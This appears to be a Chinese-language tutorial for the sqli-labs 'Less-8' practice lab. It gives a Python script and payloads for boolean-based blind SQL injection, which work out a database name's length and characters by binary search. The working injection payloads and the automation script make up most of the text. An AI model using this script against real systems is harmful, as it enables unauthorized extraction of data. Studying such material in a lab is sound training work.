目录
import requests import math url = "http://127.0.0.1/Less-8" def dblength(): for i in range(20): payload = f"1' and length(database())>{i}-- " data = {'id': payload} res = requests.get(url, params=data) if 'You are in...........' not in res.text: return i def dbname(): dbname = '' length = dblength() for i in range(1, length + 1): low = 32 high = 126 flag = 0 while low <= high: mid = (low + high) // 2 payload = f"1' and ascii(substr(database(),{i},1))>{mid}-- " data = {'id': payload} res = requests.get(url, params=data) if 'You are in...........' in res.text: low = mid else: high = mid if mid == flag: dbname += chr(math.floor(mid + 1)) break flag = mid print(dbname) return dbname print('dbname is', dbname())
判断库名
1.库名长度
当大于一个不存在的长度的时候,就不会回显:
但是这个长度存在的话,会返回一个"You are in.........":
所以payload是1' and length(database())>{i}--+
def length():
for i in range(20):
payload = f"1' and length(database())>{i}-- "
data = {'id': payload}
res = requests.get(url, params=data)
if 'You are in...........' not in res.text:
return i2.库名
长度已经得出来了,然后就一个字符一个字符的判断是什么:
payload:1' and ascii(substr(database(),1,1))>33--+1.用ascll码对应字母数字,且范围是32-126
2.当没有返回值的时候就说明等于而不是大于,就得出值了。
3.加上二分法判断,比直接遍历要快